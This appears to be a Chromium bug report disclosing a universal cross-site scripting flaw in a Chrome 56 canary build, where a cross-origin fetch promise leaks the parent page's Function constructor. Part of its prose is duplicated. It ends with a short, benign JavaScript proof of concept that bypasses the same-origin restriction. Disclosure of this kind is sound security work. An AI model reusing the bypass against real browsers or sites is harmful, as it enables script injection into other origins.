### VULNERABILITY DETAILS The promise returned by `fetch.call(crossOriginWindow)` is created in the cross-origin context. Direct cross-origin scripting is not possible because cross-origin function constructors don't work anymore ( issue 541703 ). But the attacker can e.g. call other functions of the cross-origin page. ### VERSION Chrome Version: 56.0.2891.0 canary (64-bit). Does not reproduce in stable; the promise is generated in the correct context there. Possibly commit [1] might be the cause, but I'm not sure. Operating System: Windows 10 ### REPRODUCTION CASE See attachments. Save in the same directory, then open parent.html. The sandboxed child is able to call `Function.foo` of the parent page. In fact, I found a way to bypass the function constructor restrictions. That is, UXSS is possible. The trick is to create and resolve a promise, and call the function constructor in the `then` callback: ```js var parent_Promise = fetch.call(parent).constructor; var parent_Function =...
### VULNERABILITY DETAILS The promise returned by `fetch.call(crossOriginWindow)` is created in the cross-origin context. Direct cross-origin scripting is not possible because cross-origin function constructors don't work anymore ( issue 541703 ). But the attacker can e.g. call other functions of the cross-origin page. ### VERSION Chrome Version: 56.0.2891.0 canary (64-bit). Does not reproduce in stable; the promise is generated in the correct context there. Possibly commit [1] might be the cause, but I'm not sure. Operating System: Windows 10 ### REPRODUCTION CASE See attachments. Save in the same directory, then open parent.html. The sandboxed child is able to call `Function.foo` of the parent page. In fact, I found a way to bypass the function constructor restrictions. That is, UXSS is possible. The trick is to create and resolve a promise, and call the function constructor in the `then` callback: ```js var parent_Promise = fetch.call(parent).constructor; var parent_Function = parent_Promise.constructor; new parent_Promise(function(resolve) { resolve(); }).then(function() { var f = new parent_Function("document.body.style.backgroundColor = 'red';"); f(); }); ```
